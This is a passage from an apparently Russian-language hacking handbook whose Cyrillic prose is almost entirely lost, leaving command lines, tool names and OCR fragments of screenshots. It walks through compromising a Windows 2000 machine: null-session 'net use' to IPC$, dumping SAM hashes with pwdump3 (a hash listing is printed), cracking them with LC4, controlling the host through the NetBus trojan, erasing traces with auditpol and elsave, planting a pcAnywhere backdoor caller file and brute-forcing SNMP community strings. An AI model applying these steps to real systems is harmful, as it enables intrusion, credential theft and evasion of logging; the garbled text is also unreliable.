- , nbname, ,
nbname.
amak DoS
DoS - ,
. ,
, , . , [11] , , DoS, , , Web- . ,
Web-. ,
DoS.
DDoS - , , , , ,
13. DoS
223
-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir), http://www.foundstone.com
DDoSPing 2.0, -. , UDP,
UDP .
. 13.11 DDosPing 2.0, .
DDoSPing 2.00
IP: 1.0.0.1
-Target IP address range Start IP address
|1.0.0.5[
End IP address
h .0.0.5
Stop
-Transmission speed control min

Speed (pkts/sec)
I
181
-o-
Modem > Coble > T1 > IAN

-Infected Hosts -
Program started: Sun Febl 6 13:50:48 2003

Waiting 6 seconds for final results...
Program stopped: Sun Febl 6 13:50:54 2003
Current IP
Packets sent
Time elapsed
Zombies detected
1.0.0.5
3
00.00:00
0
/iftp://www.fotindstoue
Save List
Configuration
com
. 13.11.
DDoS
DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
IP-) IP- .
224
Speed () , , LAN.
, Configuration () (. 13.12).
, Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
, DDoSPing 2.0 ,
WinTrinoo, ,
- StachelDraht Tribe Flood Network.
, (. 13.12).
DDoSPing 2.00
Windows defaults
El Enable
UNIX defaults
Send to UDP port
34555
"Ping" command
pngg..Ksl44
Expected reply
PONG
Listen on UDP port J35555
S Enable
SendlCMPID
668
"Ping" command
jgesundheit
Expected reply
sicken\n
Receive ICMP ID [69
Triho Network
0 Enable
SendlCMPID
789
Receive ICMP ID [
"Ping" command
p
ShowUDPtransmit srrnrs
Max run duration (sees
i
11 (0
/n - forever)
*
Transmit each packet
times
After scan ends, wait
secsforfinal replies
Cancel
OK
Puc. 13.12.
> DDoSPing 2.0 . . 13.11 Start ()
. Infected Hosts
( ).
, -
Zombie Zapper
(http://razor.bindview.com/tools/ZombieZapper_form.shtml),
WinTrinoo. . 13.13 , , , DDoSPing 2.O.
13. DoS
225
-Torgel(s)
0 Specify single IP or dass subnet
Target IR
InptnlPtite .
0 Trinoo
UDP source
[53
0 Trinoo for Windows
0TFN
0 StachelDraht
Shaft - my flooded host:
[10
| Repeats (1-300)
Zap
AboTjt|
Exit
Puc. 13.13. Zombie Zapper

DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.
, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
IDS IP-, , , ,
Web. , - , .
DoS , -
- !
8 - 1687
5.
XakuHz TCP/IP
Windows 2000/XP
TCP/IP. 1 ,
. ,
,
, , , ,
.
, , -
.
, Windows 200/XP . TCP/IP ( 14),
( 15), ( 16),
( 17). 18
.
14.
Windows 2000/XP
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?
TCP/IP,
. TCP/IP - .

.
1 ,

. - 12 Web-. , , ,
. 1, ,
- .
TCP/IP
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
IP-
ICMP (Internet Control Message Protocol - ). . . 14.1 ping Sword-2000.
228
Command Prompt
,
- C:\>ping 1.0.0.1
Pinging 1.0.0.1 with 32 bytes of data:
- Reply fron 1.0.0.1: bytes=32 time<lns ITL=128
Reply fron 1.0.0.1: bytes=32 tiroe<lns TTL=128
. Reply fron 1.0.0.1: bytes-32 time<lns TTL=128
Reply fron 1.0.0.1: bytes=32 time<lns TTL=12B

Ping statistics for 1.0.0.1:
, Packets: Sent - 4, Received = 4. Lost = 0 <0x loss>,
flpproxirnate round trip tines in nilli-seconds:
, Miciinun - Ons, Maxinun = Qns, fluerage = Oms
,

Puc. 14. L
ICMP Sword-2000 ping
. ICMP ,
, , hping (http://www.hping.org/).
(.. ) ICMP,
,
.
- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 14.2).
Lookup
Me 11 Interlaces |
Resolved |SWORD-20011
Timeout
Start QMF
stopfumT
0 Ignore IP zero
0 Ignore IP 255
Extract from file
Ping
1100 |
Scan lype
Resolve hostnames
0 Only scan responsive pings
0 Show host responses
Connect
Ping only
I2000
Every pod in list
All selected ports in fist

All list ports fiom
All potts fiom
. 14.2. SuperScan 3.0
14. Windows 2000/XP
229
. 14.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .

,
, , . Windows NT/2000/XP -
NetBIOS 139.

Windows NT/2000, .
. Windows NT/2000/XP
.
net use\\1.0.0.1\IPC$ "" /user: ""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication --
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .
230

Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain
SWORD
.
SWORD. , .
C:\>net view /domain:SWORD

\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 14.3.
1
Command Prompt
IC:4Docunents and SettingsSfilex>nbtstat - 1.0.0.1
Sword I
Node IpAddress: t l . 0 . 0 . 5 ] Scope Id: I]
NetBIOS Remote Machine Name Table
SUORD-2000
SUORD-200B
SIJORD
SIJOBD
SWORD
SUORD
SWORD-2000
SUORD
HSBROHSE
INet~Seruices
IS~SWORD-20UO..
ADMINISTRATOR
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
S2-54-BB-14-
Puc. 14.3. nbtstat

Alex-3
. 14.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1>
SWORD.
14. Windows 2000/XP
231
, , - Administrator. Sword-2000 ? net view,

. . 14.4.
I Command Prompt
C:\Docunents and Settings\Alex>nbtstat -A 1.U.O.I
Sword:
Node IpAddress: [1.0.0.5] Scope Id: 13
NetBIOS Remote Machine Name Table
SUORD-2QQO
SUORD-20QQ
SUORD
SUORD
SUORD
SUORD
SUORD-2Gnt)
SUORD
nSBROUSE
INet~Seruices
IS~SUORD-2QQO..
ADMINISTRATOR
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
GROUP
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
UNIQUE
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
MAC Address - S2-54-AB-14-SS-B4
. 14.4. Sword-2000
, Administrator
Sword-2000 CD-ROM. , *
NetBIOS, Administrator,
7, 9, 13, 17, 139, 443, 1025, 1027 , :.
Administrator - : .
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS /
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. 15 .
, , ,
.

Windows NT/2000/XP .
, .
232
,
, , .
- , ..

, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:V>net use \\1.0.0.1\1$ */u:Administrator
* ,
IPC$ Administrator.
:
Type password for\\1.0.0.1\IPC$:
. ,
- , , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, ,
, . Windows NT/2000/XP , SAM (Security Account Manager ). SAM (, , ) ,
, , . , - , , , , .
,
SAM, LC4 ( LOphtcrack,
14. Windows 2000/XP
233
- LC4) (http://www.atstake.com/research/redirect.html),
.
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 4).
Pwdump2 - , Syskey.
.
PwdumpS - , Pwdump2, .
Syskey, 4; ,
SAM,
Windows 2000/XP , Windows NT
.
4 , , , .
Sword-2000 Pwdimp3, :
C:\>pwdump3 sword-2000 > password.psw
Sword-2000,
password.psw.

(Notepad) (. 14.5).
password.psw - Notepad
File
Edit
Formal
Help
(VdmimstratorSOO 7A01665EB2EBeC14AAD3e43SB51404EE:OB04l2D8761239A73143EFAE926E9FO
A:::
'
Guest:501 :NO PASSWORD

";NO PASSWORD"
"
:::
krbtgt:S02:NO PASSWORD
:7BD70B6AFK3909E00642aFE207B258:::
Alex:1110:7A0166SEB2EB6C14AAD3B435B51404EE:OBCM12De761239A73143EFAE926E9FOA:::
Ale*-1:1113:7A01665EB2EB:i4AAD3B43SB51404EE:OB0412D6761239A73143EFAE928E9FOA:::
TslnternetUb<!r:1ll4:BAD7DFC9A3l6ED47F7B4B3B55224FE93:C7BD9SEOEBBSEF513EEASA4:447
5CFO:::
I US R_S WORD-2000:111S: 3C2{ FS7EAAF6DF9E1A6F22062 A1 Si 3BE: 6FDDAS4130F3FOS7F762 F2414
B235646:::
I WAM_S WORD-2000:1116: ED30C29CC8 332 6F4A5C 20594)3490: 94688 F3440C09302 SC
B02SE6E2C:::
S WORD-2000S:! DOS: NO
PASSWORD
""""":3942CE20E6A112963BA6F7DC9BC34DD7:::
ALEX-3$:1109:NO PASSWORD""*"'"""
:B6B19C13A34F6BD4284C0199E51F12A8:::
ALEX.1$:1112:NO PASSWORD""""
'
:B7D45A21709B08W751E609477D72F:::
Puc. 14.5.
Sword-2000
, password.psw Administrator,
. , LC4, , -
234
,
Sword-2000 (. 14.6).
slake LC4 - [Untitledl]
File
View
Domain
Import
Session
Help
I User Name
I
Administrator
Guest
krbtgt
Alex
Alex-1
TslnternetUser
IUSR_SWORD-2...
IWAM_SWORD-2...
SWORD-200D$
ALEX-3J
ALEX-1S
LM Password
| <8 I NTLM Password
007
007
* missing *
* missing *
007
007
* missing *
007
007
Qd Oh Q 08
* missing *
* missing *
* missing *
Dictionary 1 of 1 [\\Alex- 3\@stake\LC4\words-english. die]
Puc. 14.6. ,
Sword-2000
Celeron 1000 , 007
. ,
LC4.
, , -
NetBIOS - , , .
, .
amaku
, - ,
, . -
, .
- ,
. , .
.
Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),

6 . IKS -
,
.
14. Windows 2000/XP
235
- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).
NetBus
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . NetBus
: - Sword-2000
(IP- 1.0.0.1), - Alex-3 (IP- 1.0.0.5).
NetBus , NBSvr
( - fe NB Server fOffl |
). NBSvr , . 14.7.
NetBus NBSvr . .
> NB Server ( NB)
Settings (). 'Settings ' Close
Server Setup ( ), L
. 14.8.
. 14.7.
NetBus
236
Accept connections
( ).
Password ()
NetBus.
Visibility of
server ( )
Full visible ( ), NetBus
( ).
Access mode ( ) Full access ( ), Sword-2000
[server setup
Run on port:
20031
Password:
f~
|
(^
Visibility of server:
| Fully visible
Access mode:
Full access
i^3
||
0 Autostart every Windows session

Log CQnirnunication
| . OK
Cancel
Puc. 14.8.
NetBus
> Autostart every Windows session ( Windows),

.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 14.9.
V NetBus 2.0 Pro
File Host Control Help
Jlt-tf
Destination
I Host
Puc. 14.9. NetBus

Host * Neighborhood * Local (
* ). Network (),
. 14.10.
14. Windows 2000/XP
237
> Microsoft Windows (Microsoft Windows Network)

(. 14.11).
x|
iNelwoik
HALEX-
l^WORD
Add...
Network neighbourhood
Network neighbourhood
Microsoft Windows
2000 !
<l
Close
Add...
] Close
. 14.11.

Puc. 14.10.
NetBus
NetBus,
Sword-2000, Add (). Add Host ( ), . 14.12.
Destination: |SWORD-2000
Host name/IP: |1.0.0.1

TCP-port: |
|
20034)
Usei name: [Administrator

Password: |""
ft
OK
Cancel
Puc. 14.12. - NetBus

Host name/IP ( /IP) IP-
1.0.0.1.
User name ( ) Administrator, Password () -
LC4 007.
. Network ().
Network (), Close ().
NetBus 2.0 Pro
(. 14,13).
238
Host
Destination
SWORO:2gOO|
My computet
[Cannot connect to 127.0.0.1
Puc. 14.13. NetBus 2.0 Pro

NetBus
> Sword-2000,
Sword-2000 Connect ().
NetBus 2.0 Pro Connected to 1.0.0.1 (v.2.0)
( 1.0.0.1 (v.2.0)).
NetBus , NetBus,
. ,
Administrator. . 14.14 NetBus, Control ().
Message manager
DesNnatior ^3 File manager
indow manager
My J$K Registry manager
Sound system
Plugin manager
Port redirect
$* Application redirect
Remote control
IffJ File actions
W Spy functions
1 Cannot conne
Q Exit Windows
Puc. 14.14. Memo Control

14. Windows 2000/XP
239
, Spy functions
( ) , , , , . ,
, ,
, .
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 13), *
. ( ).
Cokpbimue
, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpobauditpol \\sword-2000 /disable
:
RunningAudit information changed successfully on \\sword-2000...
New audit policy on \\sword-2000...
(0) Audit Disabled
System
= No
Logon
= No
Object Access
= No
Privilege Use
= No
Process Tracking
= Success and Failure
240
.
Policy Change
Account Management
Directory Service Access
Account Logon
= No
= No
= No
= No
\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.

Windows 2000/XP,
( , ).
.
> (Start)
* (Settings * Control Panel).
>
(Administrative Tools).
> (Computer Management). .
> (System Tools * Event Viewer).
> (Security Log);
.
> (Clear all
Events). (Event Viewer)
.
> (No), . .
. , -
! , -
. ,
.
14. Windows 2000/XP
241
[3] elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).

Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
). , - elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. . .

.
- .
, , ,
. Windows
( , , , [7]). Windows, IDS.

, IDS, , IP-
(, BlacklCE Defender). , ,
, -
.
15.
XakuHg cpegcmB
. , , , ,
, .
- ,
. ,
.
, ,
. ,
: , . - ,
,
.
. ,
.
( ,
18). ,

-
, 18 PhoneSweep , .

pcAnywhere 10.5.
,
SNMP (Simple Network Management Protocol - ), Windows. SNMP Windows , , - SOLARWINDS
(http://www.solarwinds.net).
15.
243
pcAnywhere
pcAnywhere (http://www.symantec.com/pcanywhere)
Symantec TCP/IP. , pcAnywhere,
.
pcAnywhere
pcAnywhere ,
, , . , pcAnywhere,
, .
pcAnywhere , -
, .
pcAnywhere
pcAnywhere.
, - pcAnywhere
pcAnywhere,
(. 15.1).
' ALEX- - pcAnywhere
01
AddreK jlj My Computei

SI Desktop
+ Q My Documents
^f Local Disk [C:|
[} Contiol Panel
- " My Netwoik Places
0 Entiie Nelwoik
I ) Microsoft Windows Nelwoik
g D on Swoid-2000
it? My Documents on S old 2000
My Web Sites on MSN
io? Test on Swoid-2000
>g) NoitonPlotected Recycle Bin
Local Disk |C:]
|jfe5tail|
. 15.1. pcAnywhere Alex-3

pcAnywhere , , pcAnywhere Manager (
pcAnywhere), . 15.2.
244
File
Edit
View
Tools
Help
I X I? I H I ' I CD Lsers.WINNTVApplicetion Dato\Symontec\pcAnywhe[3
Add Host
DIRECT
MODEM
NETWORK.
CABLE. DSL
Puc. 15.2. pcAnywhere

pcAnywhere, .
> Hosts () (. . 15.2).
> Add Host ( ).
pcAnywhere Host Properties: New Host ( pcAnywhere:
), . 15.3.
pcAnywhere Hast Properties: New Hast
Connection Into [ Settings | Callers [ Security Options) Conference j Protect Item |
O;
Choose up to two devices for this connection item by checking the boxes to the left of the device
names.
To customize e device, dick the device name end then click Details.
Device list:
D Rockwell DPFPnP
1
2
4
DSPX
NetBIOS
TCP/IP
ISDN via CAPI 2.0
OK
J[
Help
Puc. 15.3.
Connection info ( ) Device list ( ) ,
. TCP/IP, TCP/IP.
15.
245
> TCP/IP
.
> Callers ().
, . 15.4.
pcAnywhere Host Properties; New Host
I Conneclicn Into [ Settings | Callers | Security Options [ Conference [ Protect Item |
Authentication type:
Caller list:
18 I X
| C: | ..sers.W!NNT\Application Dato\Symantec\pcAnywhel^J
OK
Cancel
Help

Callers () ,
pcAnywhere, .
> Authentication type ( )
;
pcAnywhere.
> Caller list ( ) ,
. New item ( ), . pcAnywhere Caller Properties:
New Caller ( pcAnywhere: ),
. 15.5.

pcAnywhere, , , Login Name
( ), Password () Confirm Password ( ).
pcAnywhere Caller Properties: New Caller
( pcAnywhere: ) , ( Callback), ( Privileges)
( Protect item).
246
pcAnywhere Caller Properties: New Caller
Identification | Callback | Privileges | Protect Item |
Login Name:
Password:
Confirm Password:
Cancel
Apply
Help

>
pcAnywhere Caller Properties: New Caller (

pcAnywhere: ) , . Caller list (
) (. 15.6).
pcAnywhere Host Properties: New Hast
Connection Into [ Settings | Callers [Security Options [ Confetence [ Protect Item |
jpcAnywhere
|^|
Caller list:
| X. IS? | 3 " I CD | .,sers.WlNNT\Applicatiori Data\Symantec\pcAnywrie| * 1
Name
S Alex-3
I Callback
OK
Cancel
Help
Puc. 15.6. pcAnywhere !

.
> , ,
(. 15.6).
15.
247
> pcAnywhere Caller

Properties: New Caller ( pcAnywhere: ).
pcAnywhere (. 15.7).
File
Edit
View
Tools
Help
^Symantec.
I X fig | 8 I El - | Cl |...sers.WINNT\Applicetion Dala\SymanlBC\pcAnywhe|" |
Add Host
DIRECT
MODEM
NETWORK, Sword 2UIJU

CABLE. DSL
For Help, press F1
Puc. 15.7. Sword-2000e

pcAnywhere
> pcAnywhere,
Launch
Host ( ). . - .
pcAnywhere.
pcAnywhere, pcAnywhere, pcAnywhere .
> pcAnywhere Remotes ().
pcAnywhere Manager ( pcAnywhere), (. 15.8).
File
Edit
View
Tools
Help
Symantec.
~ ~~~
1ft | X ? I I " I I .sers.WINNT\Application Data\Syrnantec\pcAn>wKe[J
Add Remote
DIRECT
File
Transfer
MODEM
NETWORK.
CABLE. DSLj
Remote Control and F

For Help, press F1

pcAnywhere
248
Add Remote ( ),
. .
> , NETWORK, CABLE, DSL (, , DSL). pcAnywhere Waiting ( pcAnywhere), . 15.9.
I * ncAnywhere Waiting..
TCP/IP Hosls
SWORD-2000
1.0.0.1
(]
Wailing for selection...

i
pcAnywhere Waiting ( pcAnywhere)
pcAnywhere, pcAnywhere.
TCP/IP Hosts ( TCP/IP), Sword-2000
.
> SWORD-2000.
NETWORK, CABLE, DSL - pcAnywhere (, , DSL pcAnywhere), . 15.10.
^NETWORK. CABLE. DSL - pcAnywheie
pcAnywheie Host Login

Please enter yout login information:
User name:

15.
249
pcAnywhere Host Login ( pcAnywhere)

, AIex-
Sword-2000, . , . 15.1.
pcAnywhere
Sword-2000 , Privileges ()
Alex- (. . 15.11).
Identification | Callback j Privileges Protect Item |
Superuser -caller has full access rights to host machine

0 Specify individual caller rights
0 Allow caller to blank screen
0 Allow caller to upload files
Allow caller to cancel host
0 Allow caller to download files
0 Allow caller to restart host
0 Allow use of Ctrl+Break
Time limits:
Limit time allowed per session:
^ minutes
0 Caller subject to inactivity timeout

Set Orive Access-
Command to execute after connect
Help

Privileges () Superuser
(), Alex- Sword-2000. , - /,
pcAnywhere. , .
pcAnywhere
-, , 10.5.1 pcAnywhere
, (., , [3]).
Revelation ***********
pcAnywhere Host Login ( pcAnywhere). , pcAnywhere
, (. 15.11).
, , , pcAnywhere - ,
.
250
, , /, Administrator/password,
( [3], , ). Brutus,
Web- 10 12. , , , . - , -
, .
, ? . , pcAnywhere -
. ,
, pcAnywhere, , (. 15.9).
, . , Superuser () Privileges
() (. 15.11).
. , pcAnywhere
_:/01 and Settings/All Users.WINNT/Application
Data/Symantec/pcAnywhere ( ,
pcAnywhere),
. Sword-2000
pcAnywhere Alex-
PCA.Alex-3.CIF - .. ,
, .CIF.
, , ,
pcAnywhere. pcAnywhere ,
, Hacker, PCA.Hacker.CIF
. PCA.Hacker.CIF - Sword-2000 _:/01 and Settings/All
Users.WINNT/Application Data/Symantec/ pcAnywhere,
Sword-2000 (. . 15.12).
pcAnywhere , Hacker, - ,
-.
15.
251
pcAnywhere Host Properties: Sworii-2000

| Connection Inlo | Settings [ Callers [ Security Options [ Conference j Proled Hem {
IpcAnywhere
It I X Si I " I CD |...sers.W1NNT\Application Data\Symantec\pcAnywhe|J

Name
| Callback
Alex-3
8 Hacker
AppK/
| |
Puc. 15.12. !
? ,
- NetBIOS,
9 - , , , TFTP.
- (
). pcAnywhere Web-, IIS, 12 IIS 5, ,
. , , ,

pcAnywhere - .
, pcAnywhere
?
, ,
14. Windows - , Windows NT/2000/XP, SNMP (Simple Network Management Protocol ).
252 _
SNMP
SNMP . SNMP
, - , SNMP . SNMP,
SOLARWINDS (http://www.solarwinds.net). ; , - . SOLARWINDS - , , .
SNMP
, NetBIOS TCP/IP
- Windows 2000/XP . Windows NT/2000/XP , SNMP, .
npomokoA SNMP
SNMP TCP/IP ( IPX). SNMP
- ,
- , , .
SNMP
SNMP ( SNMP) SNMP, .. SNMP, , MIB (Management Information Base - ). MD3
, ,
, , , . SNMP, , snmputil W2RK , IP
Network Browser, SOLARWINDS 2002 Engineer's Edition (
http://www.solarwind.net 30- ).
, SNMP,
SNMP, . SNMP -
15.
253
SNMP ,
, SNMP. UDP, IP, SNMP
Windows 161 162.
SOLARWINDS
SNMP, . SOLARWINDS,
.
. 15.13 MIB SolarWinds 2001
Engineer's Edition, MIB 1-3,
.
Inlv
SolarWinds MIB Browser - 0.0.5 results ...]

<p File
<3P
New
Edit
Tree
HostnameorIP
Window
1.0.0.5
[-r |
Community String |public
| I
Name
ccltt (P)
gQ3iso(1)
eG] org (3)

dod (6)
Lgj internet (1)
[-Q directory (1)
|-aQ mgmt (2)
j LffltL|miD-2(1)
1-| experi mental (3
}- private (4)
^"|
SMI'intqrnct
Get1 ...
u:i
Save
< |
|_"|s x
Help
i,
Print
-,
Get DID Gat T<ibla
Get Next
^?
Stop
Raw Value
DID Name
svUserName. 5 71.117.... Guest
svUserNome.7.78.101.... NewUser
svUserName.1 1 .73.85.... IUSR_ALEX-3
svUserName.1 1 .73.87.... IWAM_ALEX-3
svUserName. 1 3,65.1 0... Administrator
svUserName. 13.72.10... HelpAssistant
svUserName 1 6.83.85.... SUPPORT_388345aO
svShereNumber.O
5
svShareNome. 4.1 16.1 ... test
svSriareNarrie6.6-f.il... stake
Clear
14
Puc. 15.13. MIB Alex-3

. 15.13 , , , SAM LC4 (. 14).
, , SAM,
, .
, IP
Network Browser, (. . 15.14).
254
-jn|x
IP Network Browser I 1.0.0.1 ]

File
Edit
Nodes
MIBs
Discovery
Subnet
View
Help
| |> Windows NT Domain Controller

| C^ Conenunity String: public
Syatero MIB
Interfaces
- Shared printers
Services
Accounts
~.
Shares
Hub ports
TCP/IP Networks
IPX Hetwork
ARP Table
m - Routes
B- - UDP Services
TCP Connections
Subnet Seen Completed
Puc. 15.14. 1 IP Network Browser

MIB
,
. ,
SOLARWINDS 2001 Engineer's Edition SNMP
Brute Force Attack SNMP Dictionary Attack MIB , , ,
.
.
[3] SNMP ,
, public,
private, . - [3], ,
. SNMP
Brute Force Attack SNMP Dictionary Attack
SNMP . SNMP public private

. public"!, public2 , public. -
.
, SNMP Brute Force Attack, SNMP
.
> SNMP Brute Force Attack.
SNMP Brute Force Attack ( SNMP ) (. 15.15).
15.
255
SNMP Brute Force Attack

File
Edit
Export
Help
Print
s!
Settings
<$
Help
s*
<rJV
w'
lf
Target Hostname or IP Address jl

Attack Speed: Fast
Ml
11
1 >1
Attacl
E
A
. 15.15. SNMP
> Settings (). SNMP
Brute Force Attack References ( SNMP ),
. 15.16.
SNMP Brute Force Attack Preferences .
jenerajjl Character Set] Community Strings [ SNMP|
0 Stop searching after Reed/Only string is found
Try community strings up to 6 characters long
OK
Cancel
Help
Puc. 15.16.
>
Try community
string up to 6 character long (
6 ).
, ; , ,
. ( - ,
,
- . , , ?) , -
SNMP, - public, private - !
256
> , , Try community string up to 6

character long ( 6
) 7 , .
>
Community string ( ); . 15.17.

;
SNMP Brute Force Attack Preferences .
General |~Charader seifcommumtyjilrings SNMP|

Storting Community Siring [publica
Leave this blank to search all
possible community strings
0 Rotate from right to left
Example: AAAB. AAAC. AAAD. AAAE. MAP
Rotate from left to right
Example: AAAA DAAA EAAA FAAA
Help
Puc. 15.17. SNMP

Starting Community String ( ) publics - 7- .
.
SNMP Brute Force Attack ( SNMP )
Attack ().
- Current Community String
( )
. , . 15.18.
SNMP Brute Force Attack
SNMP Attack complete.
A Read/Only Community string of "public!" was
discovered.
OK
Puc. 15.18. SNMP - publid!

, ...
SNMP, 161 162, SNMP, TCP/IP, (Services)
Windows 2000/XP, SNMP.
SNMP
,
SNMP.
15.
257
, ( pcAnywhere), (
SNMP) ,

( ). , [3].
pcAnywhere , , -, ,
.
, SNMP,
SNMP . IP
Network Browser, , pcAnywhere,

pcAnywhere.
SNMP .
SNMP, Windows,
SNMP.
.
, , ,
- pcAnywhere
,
. ,
pcAnywhere ,
, .
Windows - .
9- 1687
16.
XakuH2
- ,
, , - . - , .
14 , - , , ,
, , , ,
. - ,
, . , ( ), -
, ...
, . , , ,
. , .
, , ,
? - . , ,
, . ,
... ,
, . -
. .
makoe
- ,
, , , .
,
.
16.
259
,
. ,
ACL (Access Control List -
). ACL
, , , , ,
.
, .

, . , .
IP-
, (
NAT - Network Address Translation). IP- , , , ,
.
, .
- .
, , , , ..
, . (., , [2, 12]),
80%
.

. ,
,
.

, .
9*
260
, ,
, .
.
,
.
.
. IP- . IP.
. ,
, , IP-
, , , ,
ACL.
( ), , , . -, ,
. ,
-,
, - , . -,
.
,
. , , ,
. ,
, , , Telnet, DNS, FTP, SNMP
. -
, , , , Telnet ( ), .
. - , .
16.
261
Hacmpouka nakemoB

, . , , ,
, .
, .
,
. ,
, TCP/IP UDP. , , ACL . .
ACL , , .
, , .
ACL , , , .
, :
,
(, );
;
,
, ,
25 SMTP (Simple Mail Transfer Protocol ).
, - ACL,
.
.
, ,
Mailer , Spammer.
262
(. 16.1),
.
16.1.
1.
(. 16.2).
16.2.
1.
Spammer
16.2 , , - . ,
- - Spammer, -
- . : , . , . (*) , ; , Spammer, Spammer
.
,
(. 16.3).
16.3. ,

1.
Spammer
2.
*'
Mailer
25
16.
263
2 , SMTP- 25 Mailer.
- ! 2
. 16.3 ( Spammer) - , , ,
.
, , , .
, .
. , WinRoute Pro
.
> WinRoute Pro,
WinRoute Pro WinRoute Administration (Start
Programs WinRoute Pro WinRoute Administration).
Kerio WinRoute Administrator (localhost), . 16.1.
. 16.1. WinRoute
> , Action * Connect ( *
). Open Configuration (
), . 16.2.
264
Open Configuiation
Configuration'
'
Enter a hostname or an IP address of a computer tunning
WinRoute:
WinRoute Host: [iocalhost
Username: [Admin
Password; |
OK
Cancel
. 16.2. WinRoute
, , ; .
WinRoute Settings *
Advanced * Packet Filter ( * ). Packet Filter ( ), . 16.3.
Incoming | Outgoing |
Reallek RTL8029IAS) PCI Ethernet Adapter 82 - Packet Sched

Any interface
Ed*...
Remove
OK
Cancel
Apply
Puc. 16.3.
Incoming () , Outgoing () - . .
> , Any Interface ( ), Add ().
Add Item ( ), . 16.4.
16.
265
-Packet DescriptionProtocol :~
-Source
Destination-
Type: |Any addtess
Action Permit
Drop
Deny
Type : | Any address
-Valid al-
Log Packet
Log into lite
Log into window
OK
Tirne interval: |[Always)
Cancel
Puc. 16.4.
> , Protocol ()
, .
Add Item ( ) , .
> - Packet
Filter ( ) (. 16.3) .
nakemoB

, ,
.
IP- (-),
.
IP-
IP-, . ,
IP- IP- . , IP-
.
, , . -,
, , .
266
, ,
.
,
,
. , , .
,
.
, ; - SYN. -
- , SYN,
- ,

.
,
, . ,
, , .
, , , .
, .
nocpegtmku
,
, .
,
-.
,
. .

-,
, ,
. , , . , - FTP
16.
267
FTP , -
FTP-.
-
, , -
.

, . ,
, .
Deerfield Wingate Pro
(http://www.wingate.com). - . , , , .
kanaAbHbie

.
-
, .
,
, .
. , , , .
. ,
,

.
,
. ,
.
Hacmpouka
, ,
- ? -
268
, ,
( ) .
. , .
, .
WinRoute Pro (http://www.kerio.com)
Kerio Technologies Inc. WinRoute
- , -,
( ), .
,
, . 1-1
WinRoute Pro 1-1 ,
Sword-2000. Alex- Sword-2000 1-1 .
TCP/IP Alex- IP-
2.0.0.3 255.0.0.0. 1-1 IP- 2.0.0.1 255.0.0.0.
, Windows 2000 IP-
1.0.0.1 1.0.0.7, Alex-
IP- 2.0.0.3. Alex-,
Sword-2000, - NetBUS (. 14). , NetBus - WinRoute,
.
, - ,
- . ,
. , ; - ,
. , .
XakuH2 WinRoute Pro

, ,
.
, , , .. ,
16.
269
, ,
, . .
116
, , 1-1 (IP- 1.0.0.7)
.
.
SuperScan, . 16.5
IP- 1.0.0.1 - 1.0.0.7, 1-1.
[1.0.0.1
Lookup
Resolved |SWORD-2000
imeout
-IPSlartjl 00.1
Slop|1.0.0.7
Me
IB
Ping
Connect
|20QO
IgnofelPzeto
0 Ignore IP 255
Extract from lite
Read
14000
-Scan type0 Resolve hostnames

[3 Show host responses
Interfaces
11.0.0.7
Ping only
Every port in list
11.0.0.7
All selected ports in list
11.00.7
All list ports from

All ports from
Slarl
Slap
eS 1.0.0.1 SWORD-2000
!
=i J 1.0.0.7 ALEX-1
|
*
21 File Transfer Protocol [Conlrol]
e 25 Simple Mail Transfer
H 220unspetiliedhoslESMTP-WinFloutePra42.4..
tf 80 Worldwide Web HTTP
*-- 106 3COM-TSMUX
e- 110 Post Ollice Prolocol Version 3
0 *OK WinRoule Pro 4 2.4 POP3 server ready < 1352.1047470467@ui]B
Min
. 16.5.
WinRoute
, 1-1 25 110 SMTP
, WinRoute Pro 4.1.30 - ! ,
1-1 3128 -, WinRoute Pro, 3129, WinRoute Pro (. 16.6).
270
SupeiScan 3 00
- Hostname Lookup [1.0.0.7
11
Resolved |ALEX-1
|| Me || Interfaces
Timeout
Ping
Connect
[2000
0 Ignore IP zero
0 Ignore IP 255
C3 Extiacl from file I -> I
Read
|4000 I
Scan type
